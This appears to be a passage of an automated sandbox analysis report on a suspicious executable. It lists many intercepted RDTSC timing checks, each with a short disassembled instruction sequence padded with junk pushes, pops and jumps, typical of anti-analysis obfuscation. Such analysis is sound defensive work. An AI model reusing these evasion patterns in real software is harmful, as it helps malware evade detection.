Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DACF second address: C2DB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC9D8BCC176h 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FC9D8BCC16Bh 0x00000015 popad 0x00000016 jmp 00007FC9D8BCC16Fh 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DD9D second address: C2DDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FC9D915F4BAh 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FC9D915F4C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C2DDC6 second address: C2DDE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007FC9D8BCC188h 0x0000000d push eax 0x0000000e jmp 00007FC9D8BCC16Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BCCEDB second address: BCCEDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C34261 second address: C34277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e jc 00007FC9D8BCC166h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C34277 second address: C3427F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C357A0 second address: C357FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC9D8BCC16Ch 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007FC9D8BCC166h 0x00000014 jmp 00007FC9D8BCC173h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FC9D8BCC16Ah 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pushad 0x00000024 push esi 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop esi 0x00000028 jmp 00007FC9D8BCC175h 0x0000002d push eax 0x0000002e push edx 0x0000002f jp 00007FC9D8BCC166h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A636 second address: C3A646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC9D915F4B6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A646 second address: C3A68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jmp 00007FC9D8BCC174h 0x0000000c pushad 0x0000000d jg 00007FC9D8BCC166h 0x00000013 pushad 0x00000014 popad 0x00000015 jbe 00007FC9D8BCC166h 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FC9D8BCC175h 0x00000022 pushad 0x00000023 popad 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C39880 second address: C39898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FC9D915F4BFh 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C39898 second address: C398BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 jnp 00007FC9D8BCC17Ch 0x0000000d jmp 00007FC9D8BCC170h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C39E71 second address: C39EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC9D915F4C6h 0x0000000b popad 0x0000000c jno 00007FC9D915F4BCh 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jmp 00007FC9D915F4C3h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A330 second address: C3A336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A336 second address: C3A33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A33A second address: C3A33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A4AF second address: C3A4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3A4B3 second address: C3A4B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC474A second address: BC4763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC9D915F4C1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC4763 second address: BC4767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC4767 second address: BC476B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BC476B second address: BC4771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0E6FE second address: C0E702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0E702 second address: C0E71F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC175h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EBC5 second address: C0EBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EC41 second address: C0EC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EC45 second address: C0EC94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FC9D915F4C3h 0x0000000f jmp 00007FC9D915F4BDh 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 js 00007FC9D915F4B8h 0x0000001d push esi 0x0000001e pop esi 0x0000001f push ecx 0x00000020 ja 00007FC9D915F4B6h 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FC9D915F4BCh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EC94 second address: C0ECA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jnp 00007FC9D8BCC166h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EE9B second address: C0EE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EE9F second address: C0EEA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0EEA5 second address: C0EEC7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007FC9D915F4CFh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC9D915F4BDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F01D second address: C0F021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F021 second address: C0F052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FC9D915F4BDh 0x0000000e jmp 00007FC9D915F4C2h 0x00000013 popad 0x00000014 jc 00007FC9D915F4BCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F13C second address: C0F167 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FC9D8BCC16Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC9D8BCC171h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F167 second address: C0F177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC9D915F4BBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F7BE second address: C0F7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 jns 00007FC9D8BCC16Ch 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC9D8BCC16Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F7E4 second address: C0F811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnl 00007FC9D915F4BEh 0x00000011 push esi 0x00000012 jbe 00007FC9D915F4B6h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FC9D915F4B8h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F811 second address: C0F818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F93F second address: BF1384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D915F4C7h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 jg 00007FC9D915F4B6h 0x00000018 pop ecx 0x00000019 jmp 00007FC9D915F4C0h 0x0000001e popad 0x0000001f nop 0x00000020 mov dword ptr [ebp+1244D2A4h], edi 0x00000026 lea eax, dword ptr [ebp+1248338Ch] 0x0000002c mov edi, dword ptr [ebp+122D298Dh] 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FC9D915F4BEh 0x00000039 jns 00007FC9D915F4BCh 0x0000003f popad 0x00000040 push eax 0x00000041 push esi 0x00000042 ja 00007FC9D915F4C3h 0x00000048 pop esi 0x00000049 nop 0x0000004a mov edi, dword ptr [ebp+122D30D9h] 0x00000050 call dword ptr [ebp+122D2C89h] 0x00000056 pushad 0x00000057 jmp 00007FC9D915F4C7h 0x0000005c jne 00007FC9D915F4BAh 0x00000062 popad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF1384 second address: BF1388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF1388 second address: BF138C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF138C second address: BF139C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC9D8BCC166h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3DA0F second address: C3DA21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 js 00007FC9D915F4C0h 0x0000000d push esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3DCE2 second address: C3DCE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3DCE8 second address: C3DD07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC9D915F4B6h 0x0000000a jmp 00007FC9D915F4C5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C3E0F0 second address: C3E116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Dh 0x00000009 jmp 00007FC9D8BCC175h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C41E78 second address: C41E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D915F4B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C41E82 second address: C41EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jng 00007FC9D8BCC166h 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007FC9D8BCC176h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C41EAB second address: C41EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 js 00007FC9D915F4C2h 0x0000000d js 00007FC9D915F4B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C47050 second address: C47058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C47058 second address: C47073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FC9D915F4C6h 0x0000000b je 00007FC9D915F4B6h 0x00000011 jmp 00007FC9D915F4BAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C47073 second address: C47085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FC9D8BCC16Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4720C second address: C47233 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D915F4BDh 0x0000000d jmp 00007FC9D915F4C2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4688E second address: C4689B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC9D8BCC166h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4689B second address: C468A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F4FE second address: C4F504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F504 second address: C4F512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F512 second address: C4F531 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC9D8BCC175h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F531 second address: C4F535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F83D second address: C4F841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F841 second address: C4F845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4F845 second address: C4F84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4FB62 second address: C4FB68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C4FB68 second address: C4FB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5021B second address: C50230 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC9D915F4B6h 0x00000008 jng 00007FC9D915F4B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C50230 second address: C50236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C534D2 second address: C534D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C534D6 second address: C534DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C534DC second address: C534E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C52D3B second address: C52D65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D8BCC16Eh 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C52D65 second address: C52D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C55825 second address: C5583B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Dh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A4A6 second address: C5A4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A4AA second address: C5A4BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007FC9D8BCC166h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A4BE second address: C5A4CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5A638 second address: C5A63C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AC78 second address: C5AC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AC93 second address: C5ACAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FC9D8BCC166h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5ACAF second address: C5ACBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FC9D915F4B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0F378 second address: C0F393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC173h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AE28 second address: C5AE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AE2C second address: C5AE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5AFAA second address: C5AFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4BCh 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B988 second address: C5B98C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B98C second address: C5B996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C5B996 second address: C5B99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
